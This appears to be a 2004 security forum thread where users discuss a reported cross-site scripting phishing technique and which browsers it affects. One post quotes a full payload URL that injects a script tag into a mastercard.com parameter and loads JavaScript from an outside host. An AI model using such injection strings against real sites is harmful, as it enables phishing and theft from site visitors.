New Phishing Technique Works on Multiple Browsers

Discussion in 'other security issues & news' started by ronjor, Jul 19, 2004.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,719
    Location:
    Texas
    A British Web developer has revealed a new form of a cross-site scripting, or XSS, attack that facilitates phishing activities.

    The attack, demonstrated by the developer on his own site, allows an attacker to execute scripts in the context of another Web site. Testing by eWEEK.com indicates that the attack works on both Internet Explorer on Windows XP with Service Pack 2 (Release Candidate 2) and on the Mozilla Firefox 0.9.1 browser



    http://tinyurl.com/5o27q
     
  2. Disappointed

    Disappointed Guest

    This works on firefox too?

    I want my money back :)
     
  3. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,719
    Location:
    Texas
    You couldn't get Firefox off my machine with a blow torch!! :D Phishing or no phishing.
     
  4. Eldar

    Eldar Registered Member

    Joined:
    Jul 12, 2004
    Posts:
    2,126
    Location:
    Vilvoorde (Belgium)
    o_O What about Mozilla Firefox 0.9.2?
     
  5. Pigman

    Pigman Registered Member

    Joined:
    May 15, 2004
    Posts:
    381
    Yep, 0.9.2 too. :p

    How about Opera and OffByOne?
     
  6. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    On IE6 SP2 and Opera v7.52, you see the full link :

    http://www.mastercard.com/fac/facStart.do?productId="><script%20src='http://www.zapthedingbat.com/security/scriptinjection/mastercard.js'></script>

    Not a big issue thus.
     
  7. Pigman

    Pigman Registered Member

    Joined:
    May 15, 2004
    Posts:
    381
    Wait a minute, Jack... Do you mean that you see the full link on mouse-over, or in the address bar when you're actually on the bogus page? Because I think Firefox 0.9.2 shows the address when you're on the faked page...

    Maybe this isn't such a big issue for more careful users.
     
  8. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,873
    Location:
    SW. Oklahoma
    I didn't see opera 7.53 mentioned in the article at the link in ronjor's post
     
  9. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,719
    Location:
    Texas
Loading...
Thread Status:
Not open for further replies.